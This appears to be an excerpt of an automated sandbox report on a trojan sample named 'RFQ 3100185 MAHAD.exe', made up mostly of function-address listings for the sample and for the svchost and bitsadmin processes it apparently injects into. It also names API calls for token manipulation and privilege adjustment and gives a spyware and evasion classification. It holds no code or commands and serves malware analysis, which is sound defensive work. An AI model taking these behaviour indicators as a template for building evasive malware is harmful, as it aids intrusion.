                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_00759390 NtReadFile,11_2_00759390
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_00759480 NtDeleteFile,11_2_00759480
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_00759520 NtClose,11_2_00759520
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_00759690 NtAllocateVirtualMemory,11_2_00759690
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_007F6606: CreateFileW,DeviceIoControl,CloseHandle,1_2_007F6606
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_007EACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,1_2_007EACC5
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_007F79D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,1_2_007F79D3
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_007DB0431_2_007DB043
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_007C32001_2_007C3200
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_007C3B701_2_007C3B70
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_007E410F1_2_007E410F
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_007D02A41_2_007D02A4
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_007BE3B01_2_007BE3B0
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_007E038E1_2_007E038E
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_007E467F1_2_007E467F
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_007D06D91_2_007D06D9
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_0081AACE1_2_0081AACE
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_007E4BEF1_2_007E4BEF
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_007DCCC11_2_007DCCC1
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_007BAF501_2_007BAF50
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_007B6F071_2_007B6F07
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_008131BC1_2_008131BC
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_007CB11F1_2_007CB11F
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_007DD1B91_2_007DD1B9
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_007E724D1_2_007E724D
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_007D123A1_2_007D123A
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_007B93F01_2_007B93F0
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_007F13CA1_2_007F13CA
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_007CF5631_2_007CF563
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_007FB6CC1_2_007FB6CC
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_007B96C01_2_007B96C0
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_007B77B01_2_007B77B0
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_007E79C91_2_007E79C9
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_007CFA571_2_007CFA57
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_007B9B601_2_007B9B60
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_007B7D191_2_007B7D19
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_007CFE6F1_2_007CFE6F
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_007D9ED01_2_007D9ED0
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_007B7FA31_2_007B7FA3
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_0149D8D01_2_0149D8D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004189937_2_00418993
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00401ACB7_2_00401ACB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0042F0B37_2_0042F0B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004101D37_2_004101D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004032F07_2_004032F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00402A907_2_00402A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0040E3D37_2_0040E3D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004103F37_2_004103F3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00416B8E7_2_00416B8E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00416B937_2_00416B93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00401C407_2_00401C40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00401C3A7_2_00401C3A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0040E51C7_2_0040E51C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0040E5237_2_0040E523
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00402E497_2_00402E49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00402E507_2_00402E50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00402F197_2_00402F19
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004027207_2_00402720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0384E3F07_2_0384E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039003E67_2_039003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038FA3527_2_038FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038C02C07_2_038C02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038E02747_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038F41A27_2_038F41A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039001AA7_2_039001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038F81CC7_2_038F81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038301007_2_03830100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038DA1187_2_038DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038C81587_2_038C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038D20007_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0383C7C07_2_0383C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038647507_2_03864750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038407707_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0385C6E07_2_0385C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039005917_2_03900591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038405357_2_03840535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038EE4F67_2_038EE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038E44207_2_038E4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038F24467_2_038F2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038F6BD77_2_038F6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038FAB407_2_038FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0383EA807_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038429A07_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0390A9A67_2_0390A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038569627_2_03856962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038268B87_2_038268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0386E8F07_2_0386E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0384A8407_2_0384A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038428407_2_03842840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038BEFA07_2_038BEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03832FC87_2_03832FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0384CFE07_2_0384CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03882F287_2_03882F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03860F307_2_03860F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038E2F307_2_038E2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038B4F407_2_038B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03852E907_2_03852E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038FCE937_2_038FCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038FEEDB7_2_038FEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038FEE267_2_038FEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03840E597_2_03840E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03858DBF7_2_03858DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0383ADE07_2_0383ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0384AD007_2_0384AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038DCD1F7_2_038DCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038E0CB57_2_038E0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03830CF27_2_03830CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03840C007_2_03840C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0388739A7_2_0388739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038F132D7_2_038F132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0382D34C7_2_0382D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038452A07_2_038452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0385B2C07_2_0385B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038E12ED7_2_038E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0384B1B07_2_0384B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0387516C7_2_0387516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0382F1727_2_0382F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0390B16B7_2_0390B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038EF0CC7_2_038EF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038470C07_2_038470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038F70E97_2_038F70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038FF0E07_2_038FF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038FF7B07_2_038FF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038F16CC7_2_038F16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038856307_2_03885630
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038DD5B07_2_038DD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039095C37_2_039095C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038F75717_2_038F7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038FF43F7_2_038FF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038314607_2_03831460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0385FB807_2_0385FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038B5BF07_2_038B5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0387DBF97_2_0387DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038FFB767_2_038FFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038DDAAC7_2_038DDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03885AA07_2_03885AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038E1AA37_2_038E1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038EDAC67_2_038EDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038FFA497_2_038FFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038F7A467_2_038F7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038B3A6C7_2_038B3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038D59107_2_038D5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038499507_2_03849950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0385B9507_2_0385B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038438E07_2_038438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038AD8007_2_038AD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03841F927_2_03841F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038FFFB17_2_038FFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03803FD27_2_03803FD2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03803FD57_2_03803FD5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038FFF097_2_038FFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03849EB07_2_03849EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0385FDC07_2_0385FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03843D407_2_03843D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038F1D5A7_2_038F1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038F7D737_2_038F7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038FFCF27_2_038FFCF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038B9C327_2_038B9C32
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_0318A35211_2_0318A352
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_030DE3F011_2_030DE3F0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_031903E611_2_031903E6
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_0317027411_2_03170274
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_031502C011_2_031502C0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_030C010011_2_030C0100
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_0316A11811_2_0316A118
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_0315815811_2_03158158
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_031901AA11_2_031901AA
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_031841A211_2_031841A2
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_031881CC11_2_031881CC
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_0316200011_2_03162000
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_030F475011_2_030F4750
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_030D077011_2_030D0770
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_030CC7C011_2_030CC7C0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_030EC6E011_2_030EC6E0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_030D053511_2_030D0535
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_0319059111_2_03190591
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_0317442011_2_03174420
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_0318244611_2_03182446
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_0317E4F611_2_0317E4F6
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_0318AB4011_2_0318AB40
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_03186BD711_2_03186BD7
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_030CEA8011_2_030CEA80
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_030E696211_2_030E6962
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_030D29A011_2_030D29A0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_0319A9A611_2_0319A9A6
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_030D284011_2_030D2840
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_030DA84011_2_030DA840
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_030B68B811_2_030B68B8
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_030FE8F011_2_030FE8F0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_03172F3011_2_03172F30
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_03112F2811_2_03112F28
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_030F0F3011_2_030F0F30
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_03144F4011_2_03144F40
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_0314EFA011_2_0314EFA0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_030C2FC811_2_030C2FC8
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_030DCFE011_2_030DCFE0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_0318EE2611_2_0318EE26
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_030D0E5911_2_030D0E59
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_0318CE9311_2_0318CE93
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_030E2E9011_2_030E2E90
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_0318EEDB11_2_0318EEDB
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_0316CD1F11_2_0316CD1F
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_030DAD0011_2_030DAD00
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_030E8DBF11_2_030E8DBF
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_030CADE011_2_030CADE0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_030D0C0011_2_030D0C00
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_03170CB511_2_03170CB5
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_030C0CF211_2_030C0CF2
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_0318132D11_2_0318132D
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_030BD34C11_2_030BD34C
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_0311739A11_2_0311739A
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_030D52A011_2_030D52A0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_030EB2C011_2_030EB2C0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_031712ED11_2_031712ED
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_0319B16B11_2_0319B16B
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_030BF17211_2_030BF172
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_0310516C11_2_0310516C
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_030DB1B011_2_030DB1B0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_030D70C011_2_030D70C0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_0317F0CC11_2_0317F0CC
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_031870E911_2_031870E9
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_0318F0E011_2_0318F0E0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_0318F7B011_2_0318F7B0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_0311563011_2_03115630
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_031816CC11_2_031816CC
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_0318757111_2_03187571
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_0316D5B011_2_0316D5B0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_031995C311_2_031995C3
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_0318F43F11_2_0318F43F
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_030C146011_2_030C1460
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_0318FB7611_2_0318FB76
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_030EFB8011_2_030EFB80
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_03145BF011_2_03145BF0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_0310DBF911_2_0310DBF9
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_0318FA4911_2_0318FA49
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_03187A4611_2_03187A46
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_03143A6C11_2_03143A6C
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_03115AA011_2_03115AA0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_03171AA311_2_03171AA3
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_0316DAAC11_2_0316DAAC
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_0317DAC611_2_0317DAC6
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_0316591011_2_03165910
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_030D995011_2_030D9950
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_030EB95011_2_030EB950
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_0313D80011_2_0313D800
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_030D38E011_2_030D38E0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_0318FF0911_2_0318FF09
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_030D1F9211_2_030D1F92
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_0318FFB111_2_0318FFB1
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_03093FD211_2_03093FD2
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_03093FD511_2_03093FD5
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_030D9EB011_2_030D9EB0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_03181D5A11_2_03181D5A
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_030D3D4011_2_030D3D40
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_03187D7311_2_03187D73
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_030EFDC011_2_030EFDC0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_03149C3211_2_03149C32
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_0318FCF211_2_0318FCF2
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_00741D6011_2_00741D60
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_0073CC6011_2_0073CC60
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_0073AE6011_2_0073AE60
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_0073CE8011_2_0073CE80
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_0073AFB011_2_0073AFB0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_0073AFA911_2_0073AFA9
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_0074542011_2_00745420
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_0074362011_2_00743620
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_0074361B11_2_0074361B
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_0075BB4011_2_0075BB40
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_033EE35711_2_033EE357
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_033F541C11_2_033F541C
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_033EE47411_2_033EE474
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_033ECB7811_2_033ECB78
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_033EE80F11_2_033EE80F
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_033ED8D811_2_033ED8D8
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_033F5C1111_2_033F5C11
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: String function: 0313EA12 appears 86 times
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: String function: 03105130 appears 58 times
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: String function: 03117E54 appears 111 times
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: String function: 0314F290 appears 105 times
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: String function: 030BB970 appears 277 times
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: String function: 007CEC2F appears 68 times
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: String function: 007DF8A0 appears 35 times
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: String function: 007D6AC0 appears 42 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03887E54 appears 111 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 038AEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0382B970 appears 277 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 038BF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03875130 appears 58 times
                Source: RFQ 3100185 MAHAD.exe, 00000001.00000003.1287960024.0000000003CE3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs RFQ 3100185 MAHAD.exe
                Source: RFQ 3100185 MAHAD.exe, 00000001.00000003.1287594937.0000000003E8D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs RFQ 3100185 MAHAD.exe
                Source: RFQ 3100185 MAHAD.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@11/9
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_007FCE7A GetLastError,FormatMessageW,1_2_007FCE7A
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_007EAB84 AdjustTokenPrivileges,CloseHandle,1_2_007EAB84
